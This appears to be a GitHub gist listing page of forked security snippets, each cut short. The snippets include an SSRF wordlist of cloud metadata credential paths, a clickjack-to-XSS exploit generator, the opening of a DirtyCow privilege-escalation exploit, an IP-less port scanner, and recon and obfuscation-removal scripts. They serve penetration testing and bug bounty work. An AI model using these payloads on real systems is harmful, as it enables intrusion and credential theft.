@flying0er
flying0er / reddit.sh
Created April 30, 2018 01:51 — forked from EdOverflow/reddit.sh
Use reddit.com for recon purposes.
#!/bin/bash
# Variables
BOLD='\033[1m'
END='\033[0m'
# Queries
site_results=$(curl -Ls "https://www.reddit.com/search?q=site%3A$1" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" | tidy -q 2> /dev/null | grep "search-link")
url_results=$(curl -Ls "https://www.reddit.com/search?q=url%3A$1" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" | tidy -q 2> /dev/null | grep "search-link")
self_results=$(curl -Ls "https://www.reddit.com/search?q=selftext%3A$1" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" | grep "search-title")
@flying0er
flying0er / cloud_metadata.txt
Created April 26, 2018 08:47 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@flying0er
flying0er / benchmark-commands.txt
Created March 26, 2018 07:09 — forked from jkreps/benchmark-commands.txt
Kafka Benchmark Commands
Producer
Setup
bin/kafka-topics.sh --zookeeper esv4-hcl197.grid.linkedin.com:2181 --create --topic test-rep-one --partitions 6 --replication-factor 1
bin/kafka-topics.sh --zookeeper esv4-hcl197.grid.linkedin.com:2181 --create --topic test --partitions 6 --replication-factor 3
Single thread, no replication
bin/kafka-run-class.sh org.apache.kafka.clients.tools.ProducerPerformance test7 50000000 100 -1 acks=1 bootstrap.servers=esv4-hcl198.grid.linkedin.com:9092 buffer.memory=67108864 batch.size=8196
@flying0er
flying0er / cxp.py
Created November 22, 2017 14:02 — forked from vishwaraj101/cxp.py
clickjack to xss poc
print "Clickjack to Xss"
vector=raw_input('xss vector--> ') #xss payload
html=raw_input('Custom Iframe Code--> ') #custom iframe code
fo=open('exploit.html','w') #creating html file
source_code="""<html><body>
<h1>Clickjack to exploit self xss </h1>
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
"""%(vector)
cve product bounty source
CVE-2014-0257 .NET Framework 5,000.00 https://hackerone.com/reports/18851
CVE-2015-3842 Android 2,000.00 https://code.google.com/p/android/issues/detail?id=177610
CVE-2015-3847 Android 1,500.00 https://code.google.com/p/android/issues/detail?id=179147
CVE-2015-3860 Android 500.00 https://code.google.com/p/android/issues/detail?id=178139
CVE-2015-3862 Android 333.00 https://code.google.com/p/android/issues/detail?id=181895
CVE-2015-3865 Android 1,500.00 https://code.google.com/p/android/issues/detail?id=182294
CVE-2015-3867 Android 4,000.00 https://code.google.com/p/android/issues/detail?id=182838
CVE-2015-3868 Android 4,000.00 https://code.google.com/p/android/issues/detail?id=182146
CVE-2015-3869 Android 3,000.00 https://code.google.com/p/android/issues/detail?id=182053
#!/usr/bin/sudo sh
## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.
## From `strings ruby_concealer.so`:
##
## > This obfuscation is intended to discourage GitHub Enterprise customers
## > from making modifications to the VM.
##
## Well, good, as long as its not intended to discourage *me* from doing this!
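IIS short filename guessing
On Apache + Windows, a file with a long filename can be accessed or downloaded using its first 6 characters + "~1".ext
IIS directories requiring authentication: authentication bypass
http://www.freebuf.com/articles/4908.html
Windows supports long filenames of up to 255 characters. Windows also generates MS-DOS-compatible (short) filenames in 8.3 format so that MS-DOS-based or 16-bit Windows-based programs can access these files.
Windows generates short filenames from long filenames as follows: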
@flying0er
flying0er / ipless-scan.py
Created November 2, 2017 06:15 — forked from DiabloHorn/ipless-scan.py
Perform a port scan without having an IP configured on your network interface
#!/usr/bin/env python
# DiabloHorn - https://diablohorn.com
# scan target IP from an interface with no IP configured
# POC - scapy
# pkt = Ether(dst='00:0c:29:f6:a5:65',src='00:08:19:2c:e0:15') / IP(dst='172.16.218.178',src='172.16.218.255') / TCP(dport=445,flags='S')
# sendp(pkt,iface='eth0')
import sys
from scapy.all import *
@flying0er
flying0er / c0w.c
Created July 21, 2017 03:13 — forked from KrE80r/c0w.c
PTRACE_POKEDATA variant of CVE-2016-5195
/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
*
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
@flying0er
flying0er / intercept-https-with-python-mitmproxy.md
Created August 17, 2016 06:25 — forked from dannvix/intercept-https-with-python-mitmproxy.md
Intercept and manipulate HTTPs traffic with Python and mitmproxy

Intercepts HTTPs Traffic with Python & mitmproxy

Warning

This Gist was created in 2014, and it's highly outdated now, according to one of mitmproxy's major contributors (check his comment below). Thanks for letting us know, @mhils!

Introduction

Modern applications usually make use of back-end API servers to provide their services. With a non-transparent HTTPs proxy, which intercepts the communication between clients and servers (aka the man-in-the-middle scheme), you can easily manipulate both API requests and responses.